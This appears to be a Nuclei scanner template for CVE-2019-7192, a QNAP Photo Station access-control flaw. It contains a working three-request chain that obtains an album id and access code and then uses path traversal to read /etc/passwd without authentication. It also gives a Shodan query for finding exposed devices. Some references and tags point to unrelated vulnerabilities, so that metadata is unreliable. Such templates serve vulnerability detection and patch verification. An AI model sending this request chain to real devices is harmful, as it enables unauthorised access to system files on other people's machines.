QNAP QTS and Photo Station 6.0.3 - Remote Command Execution

id: CVE-2019-7192

info:
  name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7192
    - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7192
    cwe-id: CWE-863
    epss-score: 0.96341
    epss-percentile: 0.99518
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: qnap
    product: photo_station
    shodan-query: 'Content-Length: 580 "http server 1.0"'
  tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f=qsamplealbum
      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: header_3
        words:
          - video/subtitle

      - type: status
        part: header_3
        status:
          - 200

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 490a00463044022038d4a2748704935b1e8bc5116823f31085bcbf7ea7e50794a573a764ae591c9302205bad9bbdd999c6e5f0f33dd0b4fe2e294705d0497bec580f6ecbad2993041d87:922c64590222798bb761d5b6d8e72950